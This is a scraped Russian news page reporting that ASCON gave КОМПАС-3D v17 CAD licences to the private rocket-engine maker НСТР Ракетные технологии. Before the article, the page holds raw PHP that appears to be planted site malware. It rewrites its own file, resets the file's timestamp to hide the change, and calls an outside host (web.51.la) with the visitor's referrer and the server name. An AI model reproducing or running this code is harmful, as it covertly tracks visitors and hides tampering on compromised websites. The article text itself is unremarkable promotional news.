check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456755828){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=15&id=18776972&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_search/models/views.php"); } КОМПАС и космос: АСКОН передал КОМПАС-3D v17 разработчику частных ракет
 

ГеММа-3D

СОВЕРШЕНСТВО ТЕХНОЛОГИЙ РОССИИ

  • Увеличить размер шрифта
  • Размер шрифта по умолчанию
  • Уменьшить размер шрифта

КОМПАС и космос: АСКОН передал КОМПАС-3D v17 разработчику частных ракет

E-mail Печать PDF

АСКОН передал лицензии КОМПАС-3D v17 «НСТР Ракетные технологии», разработчику первого в России частного жидкостного ракетного двигателя. Перед небольшим конструкторским коллективом компании стоит амбициозная инженерная задача — отправить в космос первую отечественную частную ракету. Надеемся, она полетит с логотипом КОМПАС-3D на борту!

Компания «НСТР Ракетные технологии», ведущая разработку сверхлегкой космической ракеты, провела огневые испытания жидкостного ракетного двигателя в конце 2016 года. На создание первого образца двигателя, спроектированного в КОМПАС-3D V16, ушло менее трех месяцев. Дальнейшую работу над своими частными космическими проектами конструкторский коллектив будет вести в КОМПАС-3D v17 — договоренность о передачи лицензий в пользование компании была достигнута в апреле в Санкт-Петербурге.

Николай Дзись-Войнаровский, генеральный конструктор «НСТР Ракетные Технологии», основатель команды «Селеноход» — участника конкурса Google Lunar X PRIZE:

«У нас небольшая компания, так что зоопарка CAD-систем нет — мы работаем только в КОМПАС-3D. Новая 17-я версия выглядит очень интересно, но все полезные изменения нам еще предстоит осознать. На данном этапе мы проводим проверку методик, тестирование прототипов — все должно делаться очень быстро. Поэтому мы сокращаем цикл проектирования, пропускаем какие-то его стадии, допускаем предоставление неполной конструкторской документации: иногда это может быть модель без сборочного чертежа, иногда наоборот. Но когда мы перейдем к серийному производству, все этапы проектирования будут происходить в полном соответствии со стандартами комической отрасли».

Николай Дзись-Войнаровский и Сергей Евсиков, директор АСКОН-Системы проектирования, на презентации КОМПАС-3D v17

Дмитрий Гинда, руководитель отдела маркетинга КОМПАС-3D:

«Мы всегда затаив дыхание смотрим программы, ролики, фильмы, посвященные космосу. И совсем уж удивляемся, когда небольшие частные компании штурмуют эти высокие (в том числе высокие и в плане технологий!) сферы. Мы не смогли пройти мимо того, чем занимаются «НСТР Ракетные технологии», зная, что можем внести свой небольшой вклад в развитие российского частного космоса, эпохи New Space. Компания уже работает в КОМПАС-3D, но не в самой актуальной и передовой версии, поэтому мы решили подарить разработчикам обновление до действительно космической версии v17».

Сборка ракетного двигателя в КОМПАС-3D V16


Источник.
 

Добавить комментарий


Защитный код
Обновить

Пользовательский поиск

Реклама


Случайная новость

 

НТЦ ГеММа планирует принять участие в семинаре «Комплексная автоматизация конструкторской и технологической подготовки производства на базе решений АСКОН» .


Cеминар проводит Компания АСКОН 26 мая 2010 г.
Ссылка: http://ascon.ru/events/?ev_id=388